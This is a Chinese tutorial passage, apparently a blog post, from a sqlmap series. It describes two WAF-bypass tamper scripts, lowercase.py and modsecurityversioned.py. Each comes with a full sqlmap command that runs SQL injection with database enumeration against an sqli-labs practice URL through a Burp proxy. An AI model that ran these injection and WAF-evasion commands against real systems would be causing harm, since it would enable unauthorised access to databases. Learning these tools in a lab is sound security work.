zoukankan      html  css  js  c++  java
  • sqlmap从入门到精通-第七章-7-12 绕过WAF脚本-lowercase.py&modsecurityversioned.py

    24. lowercase.py脚本

    将攻击的payload从大写转换为小写,适用于所有的数据库

    实战演示:

    测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="lowercase.py" --proxy="http://127.0.0.1:8080" -batch

     

    发现是可以注入的,burp抓包情况如下:

     

    都变成小写了

    ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

    25. modsecurityversioned.py脚本

    使用注释的方式围住完整的查询条件,主要是用于绕过ModSecuriy这个开源的WAF, 适用于Mysql数据库

    实战演示:

    测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="modsecurityversioned.py" --proxy="http://127.0.0.1:8080" -batch

     burp抓包没看到效果,用的比较少

    迷茫的人生,需要不断努力,才能看清远方模糊的志向!
  • 相关阅读:
    bzoj1818 [Cqoi2010]内部白点
    bzoj4001 [TJOI2015]概率论
    bzoj3997 [TJOI2015]组合数学
    bzoj3193 [JLOI2013]地形生成
    bzoj4869 [Shoi2017]相逢是问候
    bzoj4868 [Shoi2017]期末考试
    CF421D Bug in Code
    CCPC-WFinal-女生专场
    CF915F Imbalance Value of a Tree
    soj考试2
  • 原文地址:https://www.cnblogs.com/autopwn/p/13533620.html
Copyright © 2011-2022 走看看